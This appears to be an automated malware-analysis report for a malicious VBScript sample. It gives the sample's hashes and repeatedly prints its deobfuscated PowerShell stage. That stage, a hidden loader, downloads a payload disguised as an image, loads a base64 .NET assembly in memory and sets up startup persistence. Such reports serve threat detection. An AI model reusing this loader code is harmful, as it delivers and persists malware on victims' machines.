Malicious
Malicious

258a8e63d55665f84338848d1eb1f114

VBScript
|
MD5: 258a8e63d55665f84338848d1eb1f114
|
Size: 75.92 KB
|
text/vbscript


Print
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
Hash Value
MD5
258a8e63d55665f84338848d1eb1f114
Sha1
03bc347e388fb15b90ccc64a3dde6fc957065f71
Sha256
6f42f8cc868d9102b1ecd404c9f7635dd1241c56781ca0d7bc0235b6e998e65d
Sha384
964ac92bc7d3d201b4df94250dcb3262c8f300dc9af88e53d147cf0049268342f69e1215652199c21ee6d06607fd780d
Sha512
b7e4758ef538860604260fe4b3bec70db722790eeebe24f825fd721328dc8d07bcb2d1ce54640cd5a213678779f215f8c5d1b925f96ba9353390c25e5f6c9177
SSDeep
1536:N3PqYc/3zpC6Wlrhfis6LwkdJTrsxzxQ3f1p6TYPaKyB+aL313sYEOx:AYcfLO+sxhJ
TLSH
9D73F9E6B91BC4B7444D9D712EF924F719AA50D60182C0FFD1BB4B34F0168C796AC2AB
File Structure
Artefacts
Name
Value
URLs in VB Code - #1

http://www.ostrosoft.com/smtp.html

Deobfuscated PowerShell

powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vYXJjaGl2ZS5vcmcvZG93bmxvYWQvb3B0aW1pemVkX21zaV8yMDI1MDgyMS9vcHRpbWl6ZWRfTVNJLnBuZycpIC1tYXRjaCAnQmFzZVN0YXJ0LSguKj8pLUJhc2VFbmQnKTskdmFsb3IgPSAkbWF0Y2hlc1sxXTskYXNzZW1ibHkgPSBbUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR2YWxvcikpOyRvbGluaWEgPSAnPVFIZTA1eVpwSldidDFXYnQxV2J0VjJMeWNqTHlFak11UXpOeDR5TndFekx2b0RjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJ0M6XFVzZXJzXFB1YmxpY1xEb3dubG9hZHNcJywnTmFtZV9GaWxlJywnSW5zdGFsbFV0aWwnLCcnLCdJbnN0YWxsVXRpbCcsJycsJ1VSTCcsJ0M6XFVzZXJzXFB1YmxpY1xEb3dubG9hZHNcJywnTmFtZV9GaWxlJywndmJzJywnMScsJycsJ1Rhc2tfTmFtZScsJzAnLCdzdGFydHVwX29uc3RhcnQnKSk7')) | Invoke-Expression"

Deobfuscated PowerShell

Invoke-Expression

Deobfuscated PowerShell

$null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250821/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=QHe05yZpJWbt1Wbt1WbtV2LycjLyEjMuQzNx4yNwEzLvoDc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "C:\Users\Public\Downloads\", "Name_File", "InstallUtil", "", "InstallUtil", "", "URL", "C:\Users\Public\Downloads\", "Name_File", "vbs", "1", "", "Task_Name", "0", "startup_onstart") } ))

Deobfuscated PowerShell

powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vYXJjaGl2ZS5vcmcvZG93bmxvYWQvb3B0aW1pemVkX21zaV8yMDI1MDgyMS9vcHRpbWl6ZWRfTVNJLnBuZycpIC1tYXRjaCAnQmFzZVN0YXJ0LSguKj8pLUJhc2VFbmQnKTskdmFsb3IgPSAkbWF0Y2hlc1sxXTskYXNzZW1ibHkgPSBbUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR2YWxvcikpOyRvbGluaWEgPSAnPVFIZTA1eVpwSldidDFXYnQxV2J0VjJMeWNqTHlFak11UXpOeDR5TndFekx2b0RjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJ0M6XFVzZXJzXFB1YmxpY1xEb3dubG9hZHNcJywnTmFtZV9GaWxlJywnSW5zdGFsbFV0aWwnLCcnLCdJbnN0YWxsVXRpbCcsJycsJ1VSTCcsJ0M6XFVzZXJzXFB1YmxpY1xEb3dubG9hZHNcJywnTmFtZV9GaWxlJywndmJzJywnMScsJycsJ1Rhc2tfTmFtZScsJzAnLCdzdGFydHVwX29uc3RhcnQnKSk7')) | Invoke-Expression"

Deobfuscated PowerShell

Invoke-Expression

Deobfuscated PowerShell

Invoke-Expression

Deobfuscated PowerShell

$null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250821/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=QHe05yZpJWbt1Wbt1WbtV2LycjLyEjMuQzNx4yNwEzLvoDc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "C:\Users\Public\Downloads\", "Name_File", "InstallUtil", "", "InstallUtil", "", "URL", "C:\Users\Public\Downloads\", "Name_File", "vbs", "1", "", "Task_Name", "0", "startup_onstart") } ))

258a8e63d55665f84338848d1eb1f114 (75.92 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙